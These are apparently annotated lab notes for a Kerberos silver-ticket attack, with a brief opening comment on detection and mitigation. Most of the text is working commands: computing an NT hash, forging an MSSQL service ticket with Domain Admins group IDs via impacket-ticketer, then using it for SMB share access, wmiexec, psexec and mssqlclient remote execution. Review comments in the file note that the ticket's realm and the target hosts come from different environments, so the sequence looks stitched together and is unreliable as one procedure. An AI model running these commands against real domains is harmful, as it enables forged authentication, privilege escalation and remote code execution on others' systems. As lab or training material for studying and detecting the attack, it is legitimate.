# Silver-ticket lab notes. Defender context: the ticket in step 2 is built
# entirely client-side from the service account's NT hash, so no KDC ticket
# request exists for it; detection has to come from the service host (Kerberos
# logons with no matching DC ticket-request event, PAC validation) and the
# mitigation is a long, random, regularly rotated service-account password
# (gMSA where possible) and keeping service accounts out of privileged groups.
#
# NT hash of the password = MD4 over its UTF-16LE encoding. 'echo -n' is
# non-portable; printf '%s' is the usual spelling (left as-is here).
echo -n 'Service1' | iconv -t utf16le | openssl dgst -md4
# Forge a service ticket for the MSSQL SPN, signed with that NT hash and
# carrying the listed group RIDs in the PAC. The cache file is named after
# the user argument (administrator.ccache, see the export below).
impacket-ticketer -nthash e3a0168bc21cfb88b95c954a5b18f57c -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain NAGOYA-INDUSTRIES.COM -spn MSSQL/nagoya.nagoya-industries.com -groups 512,513,52 administrator
# Point the Kerberos client libraries at the forged cache.
# Shell nit: quote the expansion — KRB5CCNAME="$(pwd)/administrator.ccache"
# (or simply "$PWD") — so a working directory with spaces does not break it.
export KRB5CCNAME=$(pwd)/administrator.ccache
# NOTE(review): the ticket above is for nagoya.nagoya-industries.com in realm
# NAGOYA-INDUSTRIES.COM, but every command below targets SQL01.haero.local.
# These look like notes from two different environments — confirm which
# realm/host each half belongs to before treating this as one procedure.
impacket-smbclient -k -no-pass //SQL01.haero.local/C$ -target-ip SQL01.haero.local
# or for remote exec (requires local admin)
impacket-wmiexec -k -no-pass SQL01.haero.local
impacket-psexec -k -no-pass SQL01.haero.local
impacket-mssqlclient -k -no-pass SQL01.haero.local -windows-auth
# --negotiate -u : authenticates with the ticket from KRB5CCNAME;
# -k disables TLS certificate verification (lab-only setting).
curl --negotiate -u : -k https://SQL01.haero.local/
/etc/krb5user.conf
# MIT krb5 client configuration used by the impacket/curl commands above.
# NOTE(review): the realm here is NAGOYA-INDUSTRIES.COM while the commands
# above target hosts in haero.local — confirm this file matches the target.
[libdefaults]
# Realm assumed for principals given without one.
default_realm = NAGOYA-INDUSTRIES.COM
# Compensate for clock skew between this client and the KDC.
kdc_timesync = 1
# Credential-cache file format version.
ccache_type = 4
# Request forwardable/proxiable tickets. Defender note: these flags let a
# stolen cache be used for delegation, widening the blast radius of a leak.
forwardable = true
proxiable = true
# Do not reverse-resolve the host when building the service principal name.
rdns = false
# Use hostnames exactly as typed; no DNS canonicalization of the SPN host.
dns_canonicalize_hostname = false
# Heimdal-compatibility setting for ticket flags in FILE caches; MIT krb5
# appears to ignore it — confirm if it is relied upon.
fcc-mit-ticketflags = true
[realms]
NAGOYA-INDUSTRIES.COM = {
# KDC to contact for this realm (TGT/TGS requests; unused by a forged ticket).
kdc = nagoya.nagoya-industries.com
}
[domain_realm]
# Map the DNS suffix to the realm.
.nagoya-industries.com = NAGOYA-INDUSTRIES.COM